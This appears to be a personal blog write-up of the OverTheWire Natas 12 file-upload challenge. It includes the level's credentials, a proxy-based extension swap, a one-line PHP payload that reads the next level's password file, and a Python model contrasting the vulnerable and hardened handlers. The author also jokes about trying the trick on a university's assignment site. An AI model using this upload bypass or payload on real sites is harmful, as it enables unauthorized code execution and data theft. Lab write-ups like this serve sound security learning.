natas 12-13 (fake file upload)

How to pass:

Username: natas12
Password: KHZy1rDGIR3DBPUZKHZy1rfL
URL: http://natas12.natas.labs.overthewire.org/

The page says that images can be uploaded, with a maximum size of 1 kB. Click "View sourcecode" to view the source code; the key code is as follows:

Reading the code shows that the only restrictions are the file size limit and the file extension, and both are enforced on the front end only; the server never checks the actual type of the uploaded file. The upload handler also returns the path of the stored file, so we can simply upload a PHP file that reads the natas13 password and then browse to it. The extension of the uploaded file can be changed in transit with Fiddler or a similar intercepting proxy. (I used Burp Suite for it!)
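As an added example (not the Natas source and not code from this post), the following Python models the weak handler described above next to a hardened version, and runs both over constructed inputs. Assumptions: the form's hidden `filename` field supplies the extension the server reuses, the upload directory is called `upload`, and the natas13 password sits at `/etc/natas_webpass/natas13` (the standard Natas location; the path is not on this page).

```python
import os
import secrets

UPLOAD_DIR = "upload"  # assumption: web-accessible upload directory name
MAX_BYTES = 1000       # the 1 kB limit the page mentions

# Constructed sample inputs (not real captures).
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 28  # JPEG magic bytes plus padding
# Assumption: the natas13 password lives at the standard Natas location.
PHP_PAYLOAD = b'<?php echo file_get_contents("/etc/natas_webpass/natas13"); ?>'


def vulnerable_store(form, file_bytes):
    """Models the weak handler the write-up describes.

    The stored extension is copied from the client-supplied hidden
    'filename' field, the browser-side size limit is not re-checked, and
    the bytes are never inspected.  Returns the path the page would echo.
    """
    _, ext = os.path.splitext(form["filename"])  # attacker-controlled
    return f"{UPLOAD_DIR}/{secrets.token_hex(5)}{ext}"


# Allow-list of image signatures and the extension the server assigns.
ALLOWED_MAGIC = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
}


def hardened_store(form, file_bytes):
    """Server-side version of the same handler.

    The client's filename and extension are ignored, the size limit is
    enforced here, and the extension is chosen from the file's own magic
    bytes against an allow-list.  Raises ValueError on anything else.
    """
    if len(file_bytes) > MAX_BYTES:
        raise ValueError("file exceeds size limit")
    for magic, ext in ALLOWED_MAGIC.items():
        if file_bytes.startswith(magic):
            return f"{UPLOAD_DIR}/{secrets.token_hex(5)}{ext}"
    raise ValueError("content is not an allowed image type")


def stored_extension(path):
    """Extension of the path a handler returned (random part stripped)."""
    return os.path.splitext(path)[1]


def demo():
    # Fields as the browser sends them: the hidden filename ends in .jpg.
    browser_form = {"MAX_FILE_SIZE": "1000", "filename": "abcdefghij.jpg"}
    # The same fields after an intercepting proxy rewrites the extension.
    proxied_form = {"MAX_FILE_SIZE": "1000", "filename": "abcdefghij.php"}

    results = {
        "vuln_browser": stored_extension(vulnerable_store(browser_form, PHP_PAYLOAD)),
        "vuln_proxied": stored_extension(vulnerable_store(proxied_form, PHP_PAYLOAD)),
    }
    try:
        hardened_store(proxied_form, PHP_PAYLOAD)
        results["hard_proxied"] = "stored"
    except ValueError as err:
        results["hard_proxied"] = f"rejected: {err}"
    results["hard_jpeg"] = stored_extension(hardened_store(proxied_form, JPEG_SAMPLE))
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

With the browser's own fields the weak handler stores the PHP bytes as `.jpg`, but once the proxy rewrites the hidden field it stores them as `.php`, which is exactly why the echoed path can then be opened to run the payload. The magic-byte check in the hardened version only keeps out blatant non-images: a polyglot that begins with JPEG bytes and embeds PHP would still be accepted, so the upload directory should also be configured not to execute scripts, or kept outside the web root entirely.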

It's funny. It's very funny. If I can change the type of the files I upload like this, maybe I can do something interesting with UNSW's website when I upload my assignments... Well, this is certainly a joke (is it?)

That's too easy; there's no way a modern site could be so defenseless. I need to learn about this in more depth. It's too late today, and I have to go to a classmate's birthday tomorrow. I'll continue the day after tomorrow!

Published by endecoder

MY shitting learning experience
